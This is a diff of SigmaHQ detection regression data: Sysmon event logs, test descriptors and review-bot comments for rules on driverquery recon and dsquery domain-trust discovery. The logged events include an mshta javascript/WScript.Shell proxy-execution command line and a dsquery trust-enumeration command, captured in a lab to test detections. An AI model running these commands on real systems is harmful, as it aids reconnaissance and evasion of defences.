"SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461", + "ParentProcessGuid": "5AA13A44-B487-68FE-7E5F-000000004002", + "ParentProcessId": 11360, + "ParentImage": "C:\\Windows\\System32\\mshta.exe", + "ParentCommandLine": "mshta \"javascript:new ActiveXObject('WScript.Shell').Run('driverquery.exe');close();\"", + "ParentUser": 
"ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml new file mode 100644 index 000000000..4cc1aabef --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml @@ -0,0 +1,12 @@ +id: 585f7fa9-392b-4609-b324-4701482de7ec +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd + title: Potential Recon Activity Using DriverQuery.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx 
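Review bot: the `info.yml` in this directory points the test at the `.evtx` only (`path: regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-...evtx`), so this JSON rendering of the same Sysmon event is never read by the regression test and will drift silently if the `.evtx` is ever regenerated; either state in the directory (or the `info.yml` description) that the JSON is a human-readable companion, or have the CI script compare the two. Also worth recording somewhere: this capture exercises one shape of the activity only, `driverquery.exe` with no arguments, `ParentImage` `mshta.exe` and `CurrentDirectory` `C:\Windows\Temp\`, so if the rule is meant to fire on the driverquery invocation itself rather than on the unusual parent, a second event launched from a plain `cmd.exe` parent would show the test is not passing solely because of the parent.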
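Review bot: `regression_tests_info` here sets no `match_count`, whereas the dsquery `info.yml` in the same PR sets `match_count: 1`; without it the expected number of hits for this `.evtx` is not pinned and a rule that fires zero or several times could still pass, so add `match_count: 1` for the single event captured. Minor: `description: N/A` is a placeholder (one line naming the simulated parent process would do), and `date: 2025-10-24` predates the event's `SystemTime` of `2025-10-26T23:53:43Z` in the accompanying JSON, so the file should say whether `date` is the authoring date or the capture date.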
diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx new file mode 100644 index 0000000000000000000000000000000000000000..0cb95a003a3064c548c503e325947c55662c8490 GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json new file mode 100644 index 000000000..df3ca069d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:48:36.392892Z" + } + }, + "EventRecordID": 9075053, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:48:36.383", + "ProcessGuid": "5AA13A44-D534-68FC-FF30-000000004002", + "ProcessId": 168, + "Image": "C:\\Windows\\System32\\dsquery.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Microsoft AD DS/LDS query command line utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "dsquery.exe", + "CommandLine": "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=D6F0AD64BECE9028108C0C807E3C3A0EEAF4C31C,MD5=3A94027001259B03449AB5DC8B764E83,SHA256=A3720A70B407F069E21F2EF759236C2A7871A03D00B0AC7F0ACD201DA1086CB0,IMPHASH=0C732EE7E7F8F559606E6ADF3AA39CDC", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": 
"ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml new file mode 100644 index 000000000..cfd84a7ca --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml @@ -0,0 +1,13 @@ +id: 91c77c64-7f4f-4bba-be6a-42377c97b48a +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3bad990e-4848-4a78-9530-b427d854aac0 + title: Domain Trust Discovery Via Dsquery +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx 
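Review bot: the capture exercises a single command-line form (`dsquery * -filter "(objectClass=trustedDomain)" -attr *`), so the test guards one selection branch only, and if the `.evtx` holds just this event then `match_count: 1` in the `info.yml` cannot distinguish a precise rule from one that fires on every `dsquery.exe` launch; adding a benign dsquery event to the capture, or a separate negative test entry, would make the count meaningful. As with the other JSON file in this PR, `info.yml` references only the `.evtx`, so this JSON copy is not consumed by the test; note its purpose so it is kept in sync when the event is regenerated.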
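Review bot: `date: 2025-10-24` is earlier than the event's `SystemTime` of `2025-10-25T13:48:36Z` in the accompanying JSON, so either the field is the authoring date (then say so in the schema) or it should be corrected to the capture date; `description: N/A` should also be replaced with a line naming what was simulated, since the `title` under `rule_metadata` is the only hint a maintainer gets. The `match_count: 1` here is the right idea and should be applied consistently to the other `info.yml` files in this PR.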
diff --git a/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx b/regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx new file mode 100644 index 0000000000000000000000000000000000000000..fe978d04967ac311e0fd54d0aaad5eef69a7fb84 GIT binary patch literal 69632
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 
